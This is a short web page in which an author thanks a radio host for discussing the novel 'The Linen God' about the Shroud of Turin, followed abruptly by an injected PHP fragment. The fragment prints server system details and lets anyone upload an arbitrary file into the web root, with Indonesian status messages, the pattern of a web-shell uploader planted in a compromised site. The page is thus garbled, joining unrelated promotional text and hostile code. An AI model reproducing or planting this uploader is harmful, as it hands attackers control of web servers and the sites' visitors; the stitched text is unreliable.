Thanks to host Paul Brown and KTRS Radio for the opportunity to discuss my novel addressing the mysteries of The Shroud of Turin, “The Linen God”. Check it out!
“;
echo ““.php_uname().”
“;
echo “
“;
$root = $_SERVER[‘DOCUMENT_ROOT’];
$files = $_FILES[‘idx_file’][‘name’];
$dest = $root.’/’.$files;
if(isset($_POST[‘upload’])) {
if(is_writable($root)) {
if(@copy($_FILES[‘idx_file’][‘tmp_name’], $dest)) {
$web = “http://”.$_SERVER[‘HTTP_HOST’].”/”;
echo “sukses upload -> $web/$files“;
} else {
echo “gagal upload di document root.”;
}
} else {
if(@copy($_FILES[‘idx_file’][‘tmp_name’], $files)) {
echo “sukses upload $files di folder ini”;
} else {
echo “gagal upload”;
}
}
}
?>